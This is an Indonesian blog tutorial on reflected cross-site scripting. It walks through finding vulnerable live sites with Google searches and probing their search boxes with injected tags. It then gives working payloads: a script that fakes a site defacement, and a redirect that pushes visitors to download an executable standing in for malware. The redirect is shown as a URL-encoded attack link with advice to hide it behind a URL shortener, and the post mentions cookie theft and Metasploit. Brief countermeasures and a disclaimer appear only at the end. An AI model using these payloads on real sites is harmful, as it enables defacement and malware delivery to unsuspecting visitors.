Friday, April 24, 2020

Hacking Dasar melalui Cross Site Scripting Vuln XSS

Hacking Dasar melalui Cross Site Scripting Vuln [XSS]


Jenis : Tutorial

Level : Rendah Target : Cross Site Scripting (XSS) situs Rentan

Menurut wikipedia.org Cross Site Scripting (XSS) adalah:


Cross-site scripting

From Wikipedia, the free encyclopedia
Cross-site scripting (XSSadalah jenis kerentanan keamanan komputer yang biasa ditemukan di aplikasi web. XSS memungkinkan penyerang untuk menyuntikkan skrip sisi klien ke halaman web yang dilihat oleh pengguna lain. Kerentanan scripting lintas situs dapat digunakan oleh penyerang untuk memotong kontrol akses seperti kebijakan asal yang sama. Skrip cross-site yang dilakukan di situs web menyumbang sekitar 84% dari semua kerentanan keamanan yang didokumentasikan oleh Symantec pada tahun 2007. [1] Perusahaan bounty Bug HackerOne pada tahun 2017 melaporkan bahwa XSS masih merupakan vektor ancaman vector.[2] XSS bervariasi berkisar dari gangguan kecil hingga risiko keamanan yang signifikan, tergantung pada sensitivitas data yang ditangani oleh situs yang rentan dan sifat dari mitigasi keamanan yang diterapkan oleh pemilik situs.

Sumber : Wikipedia




Jadi, katakanlah Cross Site Scripting (XSS) adalah metode hacking yang memungkinkan penyerang menyuntikkan beberapa skrip ke server web yang dapat memengaruhi pengguna lain yang mengakses laman web tersebut.

Tipe Cross Site Scripting

XSS attacks Secara luas dikelompokkan jadi 2 jenis:
  1. Non-Persistent
  2. Persistent

1. Non-Persistent XSS Attack

Jika terjadi serangan Non-Persistent, dibutuhkan pengguna untuk mengunjungi tautan khusus yang dibuat oleh penyerang. Saat pengguna mengunjungi link tersebut, kode yang dibuat akan dieksekusi oleh browser pengguna. Mari kita pahami serangan ini lebih baik dengan sebuah contoh.

Example for Non-Persistent XSS


Mari kita mulai tutorialnya ...

Persyaratan :
1. Menemukan situs rawan Cross Site Scripting (XSS) yang rentan(Vuln)
2. Ada juga yang langsung dengan file PHP

Step by Step :


1. PERTAMA

untuk tutorial ini saya akan menggunakan dari situs di internet liar (jangan khawatir, logikanya sama, begitu Anda memahaminya, Anda akan mengerti maksudnya)

2. KE DUA

Gunakan Google untuk mencari situs yang rentan(Vuln):


Anda bisa memodifikasi parameter Google untuk mencari situs yang jauh lebih spesifik bahkan dalam bahasa Anda sendiri.

3. KE TIGA
Untuk menemukan situs web yang rentan, Anda perlu melakukan trial and error. Saya menguji lebih dari 5 situs untuk menguji fitur pencarian mereka apakah rentan atau tidak untuk XSS.



Metode sederhana untuk menguji menggunakan tag <h1> dan <script> alert (x); </ script> seperti contoh gambar di atas. 4. KE EMPAT
Jika situs webnya rentan, Anda akan menemukan hal seperti ini.




Keterangan: 1. Saya menguji situs lain dan masukan kode <h1> TEST </ h1> atau <script> alert (x); </ script> di kotak pencarian. 2. Hasilnya adalah judul judul, tapi saya tidak yakin 3. Saya memeriksa sumber seleksi untuk memastikan itu tidak berani :-p 4. Ups .. kueri saya murni diproses oleh server tanpa penyaringan :-)

5. KE LIMA
Sekarang kita mendapat situs yang rentan apa yang harus dilakukan selanjutnya ?? Tahukah Anda bahwa dengan Cross Site Scripting (XSS) Anda juga bisa melakukan defacing ke situs web dengan menyuntikkan beberapa kode di dalamnya? (Tidak benar-benar merusak / palsu)





Deskripsi :

Saya meletakkan skrip ini di kotak pencarian untuk menampilkan deface situs palsu.

<script>document.body.innerHTML="<style>body{visibility:hidden;}</style><div style=visibility:visible;><h1>THIS SITE WAS HACKED</h1></div>";</script>


6. KE ENAM
Kerentanan Cross Site Scripting (XSS) ini juga bisa Anda gunakan untuk mencuri session cookie, saya akan menulis tutorialnya nanti ??


7. KE TUJUH
Sekarang setelah kita bisa melakukan deface, tunjukkan heading tag, dan beri tahu menggunakan javascript apa selanjutnya?


Katakanlah saya memiliki program exe palsu yang berisi program jahat dan saya meng-hostnya di situs lain dan saya ingin beberapa pengguna mendownloadnya. Dalam tutorial ini saya akan menggunakan putty.exe sebagai program jahat yang bisa diunduh dari http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe. Dempul BTW bukan program jahat ... dalam kasus ini saya hanya menggunakannya untuk tujuan pengujian untuk memastikan serangan itu berhasil.



Deskripsi :

On the search box I put the script :
<script>document.location="http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe";</script>
Jadi URL akan seperti ini :
http://www.vulnerablewebsite.com/search?keyword=%3Cscript%3Edocument.location=%22http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe%22;%3C/script%3E

8. KE DELAPAN
Sudah terlalu lama ?? jadi mungkin beberapa layanan yang bisa membuat URL lebih pendek akan bermanfaat untuk membuat link seperti ini:

http://goo.gl/T5tPth


9. KE SEMBILAN
Dari langkah 7 dan 8 dapatkah anda bayangkan bagaimana jika penyerang tersebut menggunakan file berbahaya yang sebenarnya untuk membahayakan komputer pengguna? atau mungkin penyerang mengkombinasikannya dengan backtrack metasploit seperti tutorial saya yang lain ? hanya kamu yang bisa menjawabnya 


Penanggulangan/Pencegahan :


  • 1. Untuk pengembang: selalu filter input pengguna dan mencegah beberapa karakter khusus diproses sebelum filter terlebih dahulu.



  • 2. Bagi pengguna: Jika Anda menemukan lingkungan yang tidak biasa atau aneh dari situs web yang Anda kunjungi, lebih baik melepaskannya.


Hope you found it useful ??

PERINGATAN !!!

  • Jangan Merusak Website Indonesia.
  • Saya Dapat Tutorial Di Atas Dari : Hacking-Tutorial
  • Walaupun Diatas Adalah website indonesia, saya harap kalian tidak melakukannya.
  • Gunakan Ilmu Dengan Bijak, Dan Hargailah Karya Anak Bangsa !!!



ADMIN : AR4Y
download


Related Post

0 comments:

Post a Comment